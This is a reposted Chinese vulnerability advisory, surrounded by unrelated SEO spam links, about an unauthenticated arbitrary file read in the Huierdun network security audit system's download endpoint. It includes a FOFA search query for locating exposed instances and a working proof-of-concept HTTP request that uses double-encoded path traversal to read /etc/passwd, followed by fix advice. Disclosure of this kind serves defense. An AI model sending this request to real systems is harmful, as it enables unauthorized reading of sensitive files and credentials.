当前位置: 首页 > news >正文

无锡有没有做网站的公司上海宽带网网站

无锡有没有做网站的公司,上海宽带网网站,公司网站招聘板块怎么做,建筑网站新闻写那些好0x01 产品简介 惠尔顿网络安全审计产品致力于满足军工四证、军工保密室建设、国家涉密网络建设的审计要求,规范网络行为,满足国家的规范;支持1-3线路的internet接入、1-3对网桥;含强大的上网行为管理、审计、监控模块&#xff1b…

0x01 产品简介

惠尔顿网络安全审计产品致力于满足军工四证、军工保密室建设、国家涉密网络建设的审计要求,规范网络行为,满足国家的规范;支持1-3线路的internet接入、1-3对网桥;含强大的上网行为管理、审计、监控模块;用户访问功能,内容过滤功能;流量控制功能、带宽管理功能;增强的应用安全扩展;强大的应用协议分析与报表功能。

0x02 漏洞概述

惠尔顿 网络安全审计系统download接口存在任意文件读取漏洞,未经身份验证的攻击者可利用此漏洞读取系统内部敏感文件及凭证,使系统处于极不安全的状态。

0x03 影响范围

version <= v10

0x04 复现环境

FOFA:app="惠尔顿-网络安全审计系统"

0x05 漏洞复现

PoC

GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

读取 /etc/passwd 文件

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

http://www.yayakq.cn/news/431105/

相关文章:

  • 免费网站注册com凶网站设计为什么要域名
  • 律师网站专业设计wordpress 生成图片
  • 有关大学生做兼职的网站免费域名申请入口
  • 深圳企业公司网站建设平台北京个人网站制作
  • 德州中文网站建设wordpress文章评论设置
  • 网站验收 流程做企业网站可以没有后台吗
  • 手机做任务的网站网站界面怎么做
  • 网站维护升级国家企业信用信息公示系统官网app
  • 网站标题前的小图标怎么做深圳网络科技有限公司排名
  • 不会代码怎么做网站上饶网站建设兼职
  • 国产做网站如何做一个网站赚钱
  • 所有的网站都要用htmlu做吗天津营销类网站设计
  • 自助网站建设 网易枸杞网站怎么做
  • 公司网站哪个建的好开店做网站有什么好处
  • 网站下载的软件在哪里找的到查公司法人天眼查
  • 网站分析实例建设企业网站需要了解什么
  • 河北省香河县建设局网站网站蓝色配色
  • 自己做网站页面我做网站价格
  • 学做网站在哪里网站开发(七)数据库的建表与连接
  • 网站建设的技术准备小型企业网站设计教程
  • html5 个人网站模板阿里云iot网站开发
  • 网站建设可行性分析报告模板滨江区网站开发公司
  • 做二维码的网站无锡做推广的网站
  • 主流门户网站有哪些四川公共资源交易中心
  • 中山市网站建设哪家好微信小程序支付功能开发
  • 手机网站开发c 教程网站关键词没被搜出来
  • 游戏网站规划方案wordpress酷炫插件
  • 导航网站能个人备案台州黄岩做网站
  • 什么叫网站备案wordpress开玩笑_呵?
  • 商业网站备案流程外贸网站建设 推广